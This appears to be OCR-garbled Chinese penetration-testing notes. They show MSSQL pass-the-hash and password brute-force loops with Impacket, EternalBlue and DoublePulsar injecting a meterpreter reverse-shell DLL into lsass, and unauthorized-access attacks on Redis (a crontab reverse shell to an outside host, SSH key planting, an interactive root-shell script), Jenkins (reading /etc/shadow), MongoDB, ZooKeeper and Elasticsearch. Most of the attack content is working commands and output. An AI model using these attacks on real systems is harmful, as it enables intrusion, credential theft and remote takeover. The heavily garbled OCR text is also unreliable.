-/Desktop/tools/impacket/examples# proxychains python mssqalclient.py 
/sa:admin@192.168.3.73 :file mssql.txt 


ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


S-chain|:«»- Stemma. 226:1082- «»«»-192.168.3.73:1433- «»«»- OK 
*} Encryption required, switching to TLS 

*] ENVCHANGE(DATABASE): Old Value: master, New Value: master 
*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: 简体 中 文 
*] ENVCHANGE (PACKETSIZE): Old Value: 4696, New Value: 16192 

] INFO(SRV-WEB-KIT): Line 1: BHRBA ERR BRA ‘master’, 
] INFO(SRV-WEB-KIT): Line 1: 已 格 语 离 设 置 更 改 为 BAY, 

] ACK: Result: 1 - Microsoft SQL Server (119 852) 

L 


QL» select @@version 


L 
* 
LI 


| 
| 
[ 
[ 
| 
[ 
[ 
[ 
E 


Microsoft SQL Server 2012 - 11.9.21600.66 (X64) 

Feb 198 2012:19:39:15 

Copyright (€). Microsoft Corporation 

Developer “Editions (64-bit) on Windows NT 6.2 «X64» (Build 9200: 


visor) 





ks 代理 ， 在 linux 环 境 下 使 用 windows 认 证 模式 ，mssqlclient 测 试 登陆 sqlserver 服 务 
执行 command.txt 内 的 sql 命 令 ， 如 下 图 


ktop/tools/impacket/examples# proxychains python mssqiclient. py 
/sqladmin:Admin12345@192.168.3.73 -windows-auth -file command.t 


4. 通 过 soc 


(http: //proxychains.$sf.net) 
copyright 2019 SecureAuth Corporation 


: 1082-<><>-192.168.3.73:1433-<><>-OK 
yn required, switching to TLS 
ANGE (DATABASE): Old Value: master, New Value: master 
ANGE (LANGUAGE): Old Value: None, New Value: 简体 中 文 
CHANGE (PACKETSIZE): Old Value: 4096, New Value: 16192 
(oRV-WEB-KIT): Line 1: 已 将 数据 库 上 下 文 更 改 为 'master'， 
SRV-WEB-KIT): Line 1: 已 将 语言 设置 更 改 为 Barr, 
Result: 1 Microsoft SOL Server (116 852) 


Aversion 


SOL Server 2012 11.0.2100.69 (X64) 
Feb 10 2012 19:39:15 
Copyright (c) Microsoft Corporation 
Developer Edition (64-bit) on Windows NT 6.2 «X64» (Build 9206: ) (Hyper 





5. 在 windows 环 境 下 使 用 windows 认 证 模式 ， 使 用 ntlm hash 验 证 方式 ，mssqlclient 测 试 登陆 
sglserver 服 务 器 ， 账 号 验证 成 功 后 执行 Command.txt 内 的 sql 命 令 ， 如 下 图 。 
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jDNintranet5Stool*Sinpacket?nssqlclient.exe -p 1433 -hashes :ccef288c6485269c20db2 
ad21734fe? rootkit /syladnin@192.168.3.73 file connand.txt windows~auth 
]npacket v8.9.1? Copyright 2082-2018 Core Security Technologies 


Encryption required, switching to TLS 
ENUCHANGECDATABASE>: Old Value: master, New Value: naster 
ENUCHANGECLANGUAGE): Old Value: Mone, New Value: ja ff ch 
ENUCHANGECPACKETSIZE>: Old Value: 4096, New Value: 16192 
INFOCSRU-UEB-KIT?: Line 1: DR NESE b PO RA 'naster' 
INFOCSRU-WEB-KIT>: Line 1: CGiS SiR Bet) wd 
ACK: Result: 1 - Microsoft SQL Server «1180 8525 
select @@version 


icrosoft SQL Server 2812 11.8.2188.68 (X645 
Feb 18 2812 19:39:15 
Copyright <c> Microsoft Corporation 


Developer Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: > (Hyper 
isor?) 


同样 可 用 于 webshell 环 境 下 ， 如 下 图 。 


Li Li 


批量 检测 


除 此 之 外 ， 还 可 以 批量 检测 内 网 SQL server 服 务 器 的 账号 安全 性 。 
需 准备 的 文件 有 : mssdqlclient.exe( 必 须 ) 
command.txt( 必 须 ) 

以 下 四 个 文件 需 选 其 一 





UNE 


* 
















txt ( 需 验证 的 ntim hash 字 符 串 列表 ) 
e txt ( 需 验 证 的 username 列 表 ) 
d.txt ( 需 验证 的 密码 字符 串 列 表 ) 
验证 的 ip 字符 串 列表 ) 


下 几 种 批量 检测 的 bat 脚 本 内 容 . » v. 
dows 认 证 模式 ， 使 用 hash 传 递 验证 ， 使 用 mssqlclient 批 量 测试 登陆 sqlserver 服 务 
为 待 检测 sqlserver 服 务 器 ip， 每 行 一 条 。 


%%i in (ips.txt) do mssqlclient.exe -p 1433 -hashes :DF92E298362E3E180ECC 
dows 认 证 模式 ， 使 用 hash 传 递 验证 ， 指 定 主机 ntlm hash 人 遍历 验证 ，hashes.txt 为 待 

1 hash 内 容 ， 每 行 一 条 

in (hashes.txt) do mssqlclient.exe -p 1433 -hashes %%i domain/adminis 


! sqlserver 认 证 模式 ， 指 定 待 检测 主机 ， 遍 历 验证 passwords.txt 内 密码 有 效 性 ， 
ds.txt 为 已 知 密码 内 容 ， 每 行 一 条 ， 验 证 成 功 后 执行 ommand.txt 内 sq 命令 。 


F sei in (passwords.txt) do mssqlclient.exe -p 1433 ./sa:%%i@192.168.3.76 
式 以 sqlserver 认 证 模式 ， 指 定 待 检测 密码 ， 遍 历 验 证 ips.txt 内 所 有 服务 器 ，ips.txt 为 待 检测 
er 服务 器 ip， 每 行 一 条 ， 验 证 成 功 后 执行 command.txt 内 sql 命 令 。 


E! in (ips.txt) do mssqlclient.exe -p 1433 ./sa:password123@%%i  -file c 
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如 下 图 ， 执 行 所 需 bat， 如 mssql.bat， 并 把 结果 输出 到 txt 文 件 内 ， 如 log.txt 


Li Biv 1 





查看 log.txt 内 容 ， 如 下 图 ， 登 陆 192.168.229.194 sqlserver 服 务 器 验证 成 功 ，192.168.229.200 


登陆 凭证 错误 。 


LI 


on 


Ms17 010 py 脚本 利用 


= 
前 言 
为 什么 要 介绍 用 py 脚本 ? 因为 有 些 机 器 存在 漏洞 ， 但 是 使 用 MSF 的 模块 利用 失败 ， 而 使 用 py 脚本 则 
能 成 功利 用 。 


利用 


在 本 地 用 虚拟 机 搭建 了 Kali 和 windows7 系统 


192.168.1.104 物理 机 IP 
192.168.1.105 虚拟 机 Kali IP 
192.168.1.106 虚拟 机 windows7 IP 


BD: 192.168 .1.104 是 操作 机 192.168.1.106 是 靶 机 


天 为 我 搭建 的 是 64 位 的 Windows7 系 统 。 所 以 在 kali 中 用 metasploit 生 成 64 位 的 dll 


msfvenom -p windows/x64/meterpreter/reverse tcp LHOST-192.168.1.105 LPORT=12399 


msfvenom -p windows/meterpreter/reverse tcp LHOST-192.168.1.105 LPORT-12399 -f c 


4 Nc > 
492368*J:105 是 Kali 的 IP，LPORT 可 以 随意 设置 。 但 是 之 后 的 LPORT 必 须 与 此 时 设置 的 端口 要 一 
Ed 

生成 了 dll 


# msfvenom -p windows/x64/meterpreter/reverse tcp LHOST=192.168.1.105 
99 -f dll >64.d11 


form was selected, choosing Wsf::Module::Platform::Windows from the paylo 


n selected, seleCting Arch: x86 64 from the payload 
ler or badcbérs specified, outputting raw payload 
lze: 518 bytes 
oll file: 5120 bytes 


Bk :视频 AH XA FR Bk Sih 





Msfconsole 进入 控制 台 

use exploit/multi/handler // 使 用 监听 模块 

set payload windows/x64/meterpreter/reverse_tcp // 设 置 payload 
show options // 查 看 配置 信息 

set LHOST 192.168.1.105 // 设 置 本 地 IP 

set LPORT 12399 // 设 置 本 地 端口 

run // 运 行 


| root@kali: ~ (~ 
| 文件 (F) MIE SANV) 搜索 (S) 终端 (T) 帮助 [H) 
Name Current Setting Required Description 


EXITFUNC process Exit technique (Accepted: '' 
process, none) 

LHOST The Listen address 

LPORT 4444 The listen port 


Exploit target: 


Id Name 


Wildcard Target 


msf exploit( ) >{ set LHOST 192.168.171.105 
LHOST => 192.168.1.105 

msf exploit(! ) >i set LPORT 12399 

LPORT => 12399 | 

msf exploit( ter) >f run 

[*] Started reverse TCP handler on 192.168.1.105:12399 
[*] Starting the payload handler... 





进入 shadowbroker-masker 文 件 夹 下 的 windows 文 件 夹 内 打开 fb.py 





t Windows (he 4 1. 7661] 
(c) 2099 Microsoft Corporation 


or»D 


D: Noed, D: \design\tools\NSA\shadowbroker-master\windows | he 


["],Loading Plugins 

[x]-Initializing Fuzzbunch 

[A], Adding Global Variable 

[*] Set ResourcesDir => D:\DSZOPSDISK\ Resources 
[*) Set Color => True 

{+} Set ShowHiddenParameters => False 

[*] Set NetworkTimeout => 60 

[*] Set LogDir => D:\logs 

[*] Autorun ON 


orun List 








A 9) proupt confirm 
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2\cmd.exe - fb.py 


gp ete CAWindows\system? 


，FbSstorage => D:\design\tools\NSA\shadowbroker-master\windows\storage 


targetting Session 
etarg 


ult Target IP Address [] : 192.168.1.106 oo 
) 2 Callback IP Address [1 : 192.168.1.109 goo 
Use Redirection [yes] : no «e 


ase LO9 directory [D:\logs] i C:\logs assente 
cking C:Mogs for projects 
Project 


Create a New Project 


oject [0]: 9 S i 

w Project Name : Test_Win? poe | 
set target log directory to ‘€:\logs\test_win?\z192.168.1.106'? [Yes] : 
Initializing Global State 
set TargetIp => 192.168.1.106 

t CallbackIp => 192.168.1 104 


irection OFF 
) C:\logs\test_win?\z192.168.1.106 
test win? 


Entering Plugin Context :: Eternalblue 
Applying Global Variables 

Set NetworkTimeout => 60 

Set TargetIp => 192.168.1.106 


Applying Session Parameters 
Running Exploit. Touches 


Enter Prompt Mode :: Eternalblue 


NetworkTimeout 

largetIp e eet toG 
'argetPort AHS 
VerifyTarget True 

veri fyBackdoor True 
MaxExploitattempts 3 

r oomAllocations ta 


S OST JIN72K8R2 





ow EE CA 


plugin variables are valid 
Prompt For Uariable Settings? [Ves] 


[x] NetuorkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout. 
NetworkTimeout [60] 

[x] TargetIp :: Target IP Address 
TargetIp (192.168.1.106]} 

[x] TargetPort :: Port used by the SMB service for exploit connection 
TargetPort [445] 


[*] VerifyTarget :: Ualidate the SMB string from target against the target selected before expldita 
tion 


VerifyTarget [True] 


[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This Opt 
ion must be enabled for multiple exploit attempts 


VerifyBackdoor [True] 
[x] MaxExploit&üttempts Number of times to attempt the exploit and groom. Disabled for XP/2K9) 
MaxExploitattempts [3] 


ystem32\cmd.exe - fb.py 


MaxExploitüttempts [3] 


[*] GroomAllocations :: Number of large SMBu2 
to do 


GroomAllocations [12] 
[x] Target :: Operating System, Service Pack, and Architecture of target OS 


9) XP Windows XP 32-Bit All Service Packs | 
x1) WINT2KSR2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs 


Target [1] 1 us 


Preparing to Execute Eternalblue 


[x] Mode :: Delivery mechanism 


| x0) DANE Forward deployment via DARINGNEOPHYTE 
| 1) FB Traditional deployment from within FUZZBUNCH 


[2] Mode [0] : 1 ug 
[*] Run Mode: FB 


| This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] 





32\emd.exe - fb.py 
3 AWindows\system? XC J 


irection OFF 


rioure Plugin Local Tunnels 
1 Tunnel - local-tunnel-1 
-nation IP [192.168.1. 106] 


ination Port [445] : 
Local 192.168.1 106: 445 


;oure Plugin Remote Tunnels 


Value 


192.168.1.106 
445 
Q True 
i ackdoor True 
tattempts 3 
lilocations 12 
odeBuf fer 
WIN72K8R2 


pd 
Execute Plugin? [Ves] 


gm 管理 员 : C AWindows\system32\cmd.exe 


DaveProxyPort 

NetworkTimeout 

TargetIp 192.168. 
TargetPort 445 
JerifyTarget True 
JerifyBackdoor True 
iMaxExploitAttempts 3 
GroomAllocations 12 
ShellcodeBuffer 

|Target WINT2KSR2 


Execute Plugin? [Yes] 
Executing Plugin 
Connecting to target for exploitation. 
[*] Connection established for exploitation. 
Pinging backdoor... 
[+] Backdoor returned code: 10. - Success! 
[+] Ping returned Target architecture: x64 (64-bit) 
[*] Backdoor is already installed -- nothing to be done. 
[x] CORE sent serialized output blob (2 bytes): 
0x00000000. 08 91 
[x] Received output parameters from CORE 
[+}CORE terminated with status code 0x00000000 


[+] Eternalblue Succeeded An 0 


fb Special (Eternalblue) 3 





接 下 来 使 用 doublepulsar 插 件 


Use doublepulsar 





H 


Applying Global Variables 

Set NetworkTimeout => 60 

Set TargetIp => 192.168.1.106 
Applying Session Parameters 


Enter Prompt Mode Doublepulsar 


192.168.1.106 
445 


SMB 


Architecture x86 
Function Outputinstall 


Plugin Variables are NOT Valid 
Prompt For Variable Settin 


一 路 回 车 : i 


ga EA C:\Windows\system32\crnd.exe - fb.py 


[x] 


[*] 


[x] 


192.168.1.106 
445 


SMB 
x86 
OutputInstall 


Plugin Variables are NOT Valid 
Prompt For Variable Settings? [Yes] 


NetworkTimeout :: Timeout for blocking network calls (in seconds) 


NetworkTimeout [60] EE 
TargetIp :: Target IP Address 
TargetIp [192.168.1.106] : «7 


TargetPort :: Port used by the Double Pulsar back door 


TargetPort [545] : bui 


Use -1 for no timeout. 





; CAWindo ystem32Wmd.exe -和 .py 
ais TargetPort [445] 


protocol Protocol for the backdoor to speak 


9) SMB Ring 9 SMB (TCP 445) backdoor 
RDP Ring 6 RDP (TCP 3389) backdoor | 


rot col [0] 8 
rchitecture Architecture of the target OS 


x86 x86 32-bits 
x64 x64 65-bits | 


chitecture [0] 1 «4 
Set architecture => x64 


Function Operation for backdoor to perform 


Jutput Install Only output the install shellcode to a binary file on disk. 
Test for presence of backdoor 


Use an APC to inject a DLL into a user mode process 
nShellcode Run raw shellcode 


Uninstall Remove’ s backdoor from system 


t Function 





u 





ws\system32\cmd.exe “th py 


Function [0] : 2 
Set Function => RunDLL 


Me 


DllPayload :: DLL to inject into user” 


DllPaylead [] :| D:\design\tools\NSA\shadowbroker-master\64.d11 | 
Set DllPayload =$ 0: \design\tools\NSA\shadowbroker-master\64d1l 


Dllordinal :: The exported ordinal number of the DLL being injected to call 
Dl1lOrdinal [1] 

ProcessName :: Name of process to inject into 

ProcessName [lsass.exe] 

ProcessCommandLine :: Command line of process to inject into 
ProcessCommandLine [] 

Preparing to Execute Doublepulsar 

Redirection OFF 

Configure Plugin Local Tunnels 

Local Tunnel - local-tunnel-1 

Destination IP [192.168.1.106] 


Destination Port [445] : s 
(TCP) Local 192.168.1.106:44 
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\system3z2\cmd.exe - fb.py 
» 192.168.1.106 
445 
D: \design\tools\NSA\shadowbroker-master\64.d1l 
1 
lsass.exe 


a eee CAWindows 







essName 
ynandLine 
SMB 


x64 
RunDLL 


Execute Plugin? [Yes] 
uting Plugin 
ected Protocol SMB 
necting to target... 
ected to target. pinging backdoor... 
[+] Backdoor returned code; 10 - Success! 
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: Ox3C3043E 
Connection string is: Windows 7 Professional 7600 
ot OS is: 7 x64 
0 
Backdoor installed 
DLL built 
Sending shellcode to inject DLL 
Backdoor returned code: 10 - Success! 
Backdoor returned code: 10 - Success! 
Backdoor returned code: 10 - Success! 
Command completed successfully 
Doublepulsar Succeeded ni me 





fb Payload (Doublepulsar) > 


这 时 候 返 回 Kali 上 查看 msf: | 
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root@kali: ~ Q wt 
文件 (F) 编辑 (E) 查看 (V) 搜索 (S】 终端 (T) 帮助 (H 
LHOST The listen address 
LPORT 4444 The listen port 


Exploit target: 
Id Name 


8 Wildcard Target 


nsf exploit( ) > set LHOST 192.168.171.185 


LHOST => 192.168.1.105 

nsf exploit( ) > set LPORT 12399 
LPORT => 12399 

nsf exploit( ) » run 


*] Started reverse TCP handler on 192.168.1.105:12399 
PSL Start yload handler. 
]*] Sending stage (1189423 bytes) “to 192.168.1. 106 
|*] Meterpreter session 1 opened (192.168.1.105:12399 -» 192.168.1.106:49599) a 
|2817- 84- 18. 19: 45: 32 +0900 


— msc 














未 授权 访问 漏洞 


seni as P 


Redis 
Reds —1 FRI GERIANSI C 语 言 编写 、 支 持 网 络 、 可 基于 内 存 亦 可 持久 化 的 日 志 型 、Key-Value 
数据 库 。 


。 redis-cli 


$ redis-cli -h to i143.1 -p 6379 
172.16.143.1:6379> keys * 
1) " komb! 


172.16.143.1:6379> 


vn@xsy@Rvn@xsy ~> redis-cli -h 172.16.143.1 -p 6379 
.16.143.1:6379» keys * 
' kombu.binding.celeryev" 


'_kombu.binding.celery.pidbox" 
'_kombu.binding.celery" 
172.16.143.1:6379> |l 





写 入 文件 


172.16.143.1:6379» CONFIG GET dir | al po 
dy, div 

2) "/usr/local/var/db/redis" 

172.16.143.1:6379» CONFIG SET dir /tmp/ 

OK 

172.16.143.1:6379> SET foobar "who are you? RvnOxsy" 

OK 

172.16.143.1:6379» CONFIG GET dbfilename 

1) "dbfilename" 

2) "dump.rdb" 

172.16.143.1:6379» CONFIG SET dbfilename write file.log 
OK 

172.16.143.1:6379> save 

OK 

172.16.143.1:6379» 


反弹 shell - Linux 


127.0.0.1:6379» set shell "\n* * * * * bash -i >& /dev/tcp/1.1.1.1/88 0»&1*n" 
OK 

127.0.0.1:6379» config set dir /var/spool/cron/ 

OK 

127.0.0.1:6379» config set dbfilename root 

OK 

127.0,0.1:6379> save 

[238] 28 May 16:29:53.276 * DB saved on disk 

OK 


BABH 
ERAH: 


$ ssh-keygen -t rsa 
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ssh-keygen -t rsa 
Lic/private rsa key pair. 
which to save the key (/root/.ssh/id rsa): 
+ "/root/.ssh'. 
; (empty for no passphrase): 
sphrase again: 
tion has been saved in /root/.ssh/id rsa. 
has been saved in /root/.ssh/id_rsa.pub. 
erprint 1S: 
iR1L4+10ChqnMpLUjKIj kmSCTi+md3FveSNNuGC2E root@kali 
randomart image is: 
cn 


| 
| 
| 
| 
| 

| 
| 
| 
| 
1 


cat /root/.ssh/id rsa.pub 
;aC1yc2EAAAADAQABAAABAQC2 Lac En f 2Xf ZILLQ5sMu f+ pO6cdbFG9xY9BMSKBHAMKY9SuM2nEowhOgNAtOzLE cHLnMf 
muQUFmrWt9ZAAav422s rx1734ef OKs cUNQQgSMxl pSoV/LMDeXVMTnskkG085vHfu7hzDj0uQ4r315tTpiM2XwIGEFC 
QqvBP*opF7-*/mzEIZYtSIgzdoyLxWxn6nGA3MNiCCRYDv220Kea9d55SkJrMfGpi7sTXj 8Yg9n3Nj rHn18yoj csprWuSX7 
k2RCcxWuEmXsv8y82xL40NnB/iiBbznzocK586fbMgArR root@kali 





127.0.0.1:6379» config dir /root/.ssh/ 


OK 

127.0.0.1:6379» config dbfilename authorized keys 
OK 

H27.0.0.1:6379» x 

OK 

O00.1:06379> save 

OK 


清空 数据 库 


172.16.143.1:6379» FLUSHALL 
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未 授权 漏洞 总 结 
未 授权 漏洞 


0x01 Redis 
0x01-1 计划 任务 反弹 shell 


利用 计划 任务 执行 命令 反弹 she11 


在 redis 以 root 权 限 运 行 时 可 以 写 crontab 来 执行 命令 反弹 she11 
先 在 自己 的 服务 器 上 监听 一 个 端口 


nc -lvnp 7999 


然后 执行 命令 : 


root@kali: 
192. 


192 


~## redis-cli -h 
168.63.130;6379» 


.168.63.130:6379» 
192. 
192; 


168.63.130:6379» 
168.63.130:6379» 


0x01-2 5A 2A 


192.168. 63.130 

set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.12€ 
config set dir /var/spool/cron/ 

config set dbfilename root 

save 














:6379» config set dir /root/.ssh/ 


文件 名 为 authorized_keys 
1:6379» config set dbfilename "authorized keys" 


写 入 目标 机 子 ， 文 件 名 为 authorized_keys 
16379» save 


目标 
/.ssh/id rsa root@192.168.1.11 
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# coding:utf-8 * 
# redis 交 互 式 
# commands: python3 redis_shell ip 


import redis 
import sys 
import paramiko 


rsa pub = '/root/.ssh/id rsa.pub' s ASABE 
pkey = '/root/.ssh/id rsa' # 密 钥 路 径 


# 获取 公 钥 内 容 
def get_id_rsa_pub(): 
with open(rsa pub, 'rt') as f: 
id rsa pub = '\n\n\n{}\n\n'.format(f.read()) 
return id rsa pub 


def shell redis(ip): 
Ery: 
r = redis.Redis(host=ip, port=6379, socket_timeout=5) 
r.config set('dir', '/root/.ssh/') 
print('[ok] : config set dir /root/.ssh/') 
r.config set('dbfilename', 'authorized keys') 
print('[ok] : config set dbfilename "authorized keys"') 
id rsa pub = get id rsa pub() 
r.set('crackit', id rsa pub) 
print('[ok] : set crackit') 
r.save() 
print('[ok] : save') 
key = paramiko.RSAKey.from private key file(pkey) 
ssh paramiko.SSHClient() 


ssh.set missing host key policy(paramiko.AutoAddPolicy()) 


ssh.connect(ip, port-22, username="root", pkey=key, timeout=5) 
ssh stdin, ssh stdout, ssh_stderr = ssh.exec command('id') 


content - ssh stdout.readlines() 
if content: 


print("[ok] connect to {} : {}".format(ip, content[9])) 


while True: 
command = input('{} >>> '.format(ip)) 


ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command) 


contents = ssh stdout.readlines() 
for content in contents: 
print(content) 
except Exception as e: 

error = e.args 

shy erron =e ait 
error = ‘save error' 

print('[-] [{}] : {}'.format(error, ip)) 
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ae 9 
if __name__ aa — main... 


ip = sys.argv[1] 
shell redis(ip) 


1tr:~/unAuth/redis# python3 redis shell.py 5 
‘config set dir /root/.ssh/ 
t dbfilename “authorized keys” 
: uid-O(root) gid-O(root) groups=0{ root) 
- ipconfig /all 


> whoami 


> ifconfig /all 


.+ >>> ifconfig 
ink encap:Ethernet Hwaddr 02:58:C7:13:63:DC 


inet addr:1; .82  Bcast:172.31.31.255 
inet6 addr: fe80::58:c7ff:fe13:63dc/64 Scope:Link 


UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1 





0x02 Jenkins 
默认 是 8080 端 口 未 授权 访问 就 是 任意 用 户 都 能 访问 都 能 执行 命令 
127.0.0.1:8080/jenkins/manage 


127.0.0.1:8080/jenkins/script 


# 命令 集合 : | 


printin "whoami".execute().text 


# Linux: 1 

println "ifconifg -a".execute().text 
println "cat /etc/passwd".execute().text 
println "cat /etc/shadow".execute().text 


# Windows: | 

println "ipconfig /all".execute().text 

def sout = new StringBuffer(), serr = new StringBuffer() 
def proc = 'ipconfig'.execute() 
proc.consumeProcessOutput(sout, serr) 
proc.waitForOrKill(1090) 

println "out» $sout err» $serr" 








开始 真正 的 未 授权 访问 攻击 : 1 


108 





Harm? m fe) BIR— T . eae Google 正则 表达 式 + Mise ee... RBS 论坛 Easticseardh $ 乌云 网 | SEMNE.. m" 
Linus © 


SQL- XSS- Encryption: Encoding Other- 





login ?frorm= /jenkin s/ 


Enable Post data Enable Referrer 


Jenkins i 





amp ee : : 








或 者 有 些 不 需要 账号 





2 For DRM DEI — PE arem. aep RNGNUA al el DN ERA as 





cns (i SRF GAM © Google FPE 





admin 








eer 
t ystta fate 


PARAS 
1 eA 
2 avi 





© immon T 
LL MEL REL 
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n" 
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envie 
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€ 


/je pigna agera ble 


d < 
uade (BER ons SRF Gay ^ Googie met f RHXWESREG. () Tie ncdeslesdng.. (MRSS cE Gata 4 SEA SEO, o» 7 RBS Y oenui10:20025 27. 


D - Qi- KEE Erayation: Encoding- Omer 





w toa UR 
^ Split URL 
Eeede 


trable Port deta Enable Rataro 


@ Jenkins 


ase MEMERS e nem Un toy 


€ © 19216810241 





Linus > BENE cms | 党 百度 一 下 , GH 个 Google 正则 表达 式 十 Fai BNE... C) The world's leading ~. TARS 论坛 Elasticsearch d 
INT = SQL- XSS- Encryption: Encoding: Other- 





w Load URL 
Split URL 
Execute 
Enable Post data Enable Referrer 





GitHub Branch Source Plugin 


Pipeline. GitHub Grog 





Pipetine 





tage View Plugin 


Git plugir 





MapOB API Plugin 


Suoversian Plug-ir 





PAM Authent 








sian Plugin 


Maller Plugin 





s Plugin 





jQuery piugin 





Javadoc Plugin 








w 
mi 
» 
ul 
w 
"I 
Z 
; -- 
Matrix Authorization Strategy Plugin wal 完成 
d 
w 
v 
ww 
m 
"I 
wl 


E 


ernal Monitor Job Type Plugin 


jQuery UI plugin 





Terminal Plugin 


EB 


[返回 首页 使 用 已 经 安装 好 的 插件 ) 


0x03 Mongodb 


利用 可 视 化 工具 连接 默认 端口 : 28017 
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nnection 








se any connection name that will help you to identify this connection. 


: 2TO1T 





| SM getCollection( runoob e = 


105. 11 27017 Neat 





runsob |) 0.001 see, 


Key Value Type 
4 XU (1 Object 'S8dF2ads4fe24479e75c9972") 12 fields} 
bore theless 479e75c3872*) 
Mx 10.0 
TA HARRE 
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mongod kali + 
€ $ 019216810211 --—— 5 六 


Unue () EIGENS cns (AMET. AMT C Googe 正则 表达 式 È MURER.. C) The worid's leading... WARA iE  Elasticsearh Ë 马云 网 | SADA. 
INT v © @ SQ KSS- Encryption- Encoding: Other- 


gë Logd URL — httpy/192.168.103.11:26017 E 
ase Web3$ 
À ^ SpitUR. 

Execute 


Enable Post data Enable Referrer 


mongod kali 








Commands. features rep) 





db version v3, 0.6 

git hash: 1efd5a23adc5e3480ac919b28afcba3c615488f2 

gys info: Linus buildf.ny. cbi, 108en, cc 2.6. 32-421, 3. 1, e16. x86 64 #1 SMP Fri Jan 3 21:39:27 UTC 2014 x96 64 BOOST LIB VERSION-1 49 
uptime: 826 seconds 


overview (only reported if can acquire read lock quickly) 


time to get readlock: (ms 
# Cursors: 0 
replication: 





master: Q 

slave: 0 

clients 

Client Opid Locking Waiting 


(locks. (), waitingForLock. false, lockStats. ( Global. ( acquireCount. ( r. 12 1 ], MMAPV t Journal ( acquireCount {r 6}}, Database. ( scquireCount 


client rmon 6 A = 
pe sh E Collection ( acquireCount {R 6}}}} 


RangeDeleter 8 (locks: {}, waitingForLock false, lockStats 1} } 
websvr 9 {locks (y, waitingForLock false, lockStats { Global ( acquireCount {r 1, R 1)3)) 


dbtop (occurrences|percent of elapsed) 
NS ， total Reads Writes Queries GetMores inserts Updates Removes 
localsystemindexes 1 00% 100% 0 0% 0 0% 0 0% 0 0% 0 0% 0 0% 


 local.system.namespaces 1009 1/009. 0 0% 0 0% 0 0% 0 0% 0 0% 0 0% 
local.startup log 1009 10096 0 0% 0 0% 0 0% 060% 0 0% O0 0% 


baak m imha sa iaa atana a m 4 ^om A AOV ^ nw o ow A nw mane in nw ^ oom 


脚本 检测 


# coding:utf-8 

# mongodb 未 授权 检测 脚本 

# usage: python3 mongodb_unauth.py ip port 
# 默认 端口 28017 和 27017 


from pymongo import MongoClient 
import sys 


ip = sys.argv[1] 
port = int(sys.argv[2]) 





Erys 
conn = MongoClient(ip, port, socketTimeoutMS=5000) # 连接 MongoDB, 延 时 5 秒 
dbs = conn.database names() 
print('[ok] -> {}:{} database names : {}'.format(ip, port, dbs)) 
conn.close() 

except Exception as e: 
error = e.args 
print('[-] -> {}:{} error : {}'.format(ip, port, error)) 
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0x04 ZooKeeper 


默认 端口 : 2181 2171 






Li ERES 


标签 (8) MEH) 


xr) muc) BAY) mss) Hx 
et @iske: -lzookeeper-348/bn 


E x 











RGA 01: 39 PRS 





RHF) ARE MY) 搜索 (5) 终端 (T) EB) NEGO 
root @ske: ~/z00keeper-3.4.8/bin x x = 





164 
4.0.0: k 


3381032] 


Thread@ 76} 


adj 192. 168. 103. 11:.2181) 
14840000. t 








aS) / # 查 看 所 有 节点 
get / # 获 取 某 个 节点 人 
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ensive Security "Ñ Kali Linux ‘Ñ Kali Docs 
pmem(s) 终端 (T) HBB! 


X  rootQske: -/zookeeper-34.. x 


网 页 


ERP E 


BRE AGG 





脚本 检测 


# -*- coding:utf-8 -*- 
# python3 zookeeper_unauth.py IP 2181 


from kazoo.client import KazooClient 
import sys 


# 检测 是 否 存在 未 授权 漏洞 
def check zookeeper(): 
try: 
zk = KazooClient(hosts='{}:{}'.format(ip, port)) 
zk.start() 
chidlrens = zk.get_children('/') 
if len(chidlrens) > 0: 
print('[ok] -> {}:{} {}'.format(ip, port, chidlrens)) 
zk, stop() 





except Exception as e: 
zk, stop() 
error = e.args 
print('[-] error: {}'.format(error)) 


if .:name. | == '__main__': 
ip - sys.argv[1] 
port - sys.argv[2] 
check zookeeper() 





can 


py \py self Xpy3 project Vi 





a 69721 MA eae Ag | 
I LLIOl L ZOoOokeeper i 


0x05 Elasticsearch 
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plugin/head/ web 管 理 界面 


at/indices 
river/ search 查看 数据 库 敏 感 信息 


"Vampire by Night" 
"elasticsearch" 


Bs 3.1" 
*"bd980929010aefd0de7cbO8A3e61dQ565269fc39" 
1*2016-04-04T12:25:052" 

false 

15.5.0" 


"You Know, for Search" 
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elasticsearch.yml (~ /elasticsearch/config) - VIM 





EE 


aav 





me iw) REB MRH 


x x| elasticsearch ym 


Vampire by Night 





+ eo ee te 


name elasticsearch 





version" : 4 
"number" bey 2. 

“build hash" : "bd9809290102ef404e7cb08 
Ded build timestamp" ; "2016-04-04T12:25:052 


Tom 






a 
a 





build snapshot false 
ucene versi 5.5.0 
te 
"tagline You Know, for Search" 








脚本 检测 
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ist 


~~ 


Tch 未 授权 检测 脚本 
thon3 elasticsearch unauth.py ip port 


"calhost :9200/. plugin/head/ web 管 理 界面 


alhost: :9200/ cat/indices 
p" 9200/_river/_ b 查看 数据 库 敏 感 信息 


int (sys .argv[2]) # 9200 


a Elasticsearch("{}:{}".format(ip, port), timeout=5) # 连接 Elasticsearch 
S. indices.create(index-'unauth text') 

rint('[*] 成 功 连接 : {}'.format(ip)) 

rint('[-] {} -> 成 功 创建 测试 节点 unauth_text' ,format(ip)) 
index(index-"unauth text", doc_type="test-type", id-2, body={"text": "tex 
nt('[*] {} -> 成 功 往 节 点 unauth_text 插 入 数据 ' .format (ip)) 

= es.get(index="unauth_text", doc_type="test-type", id=2) 

rint('[*] {} -> 成 功 获取 节点 unauth_text 数 据 : {}'.format(ip, ret)) 
.indices.delete(index-'unauth text') 

Pprint('[*] () -> 清除 测试 节点 unauth_text 数 据 ' .format(ip) ) 

print(' [ok] {} -> 存在 ElasticSearch 未 授权 漏洞 ' .format (ip)) 


Mnt( ' 党 试 获取 节点 信息 : 1') 
E text = json. — MA get(url='http://{}:{}/_nodes'.format(ip, port), t 
C modes total = text[' nodes']['total'] 
nodes - list(text['nodes'].keys()) 
print('[ok] () -> [O0] : {}'.format(ip, nodes total, nodes)) 


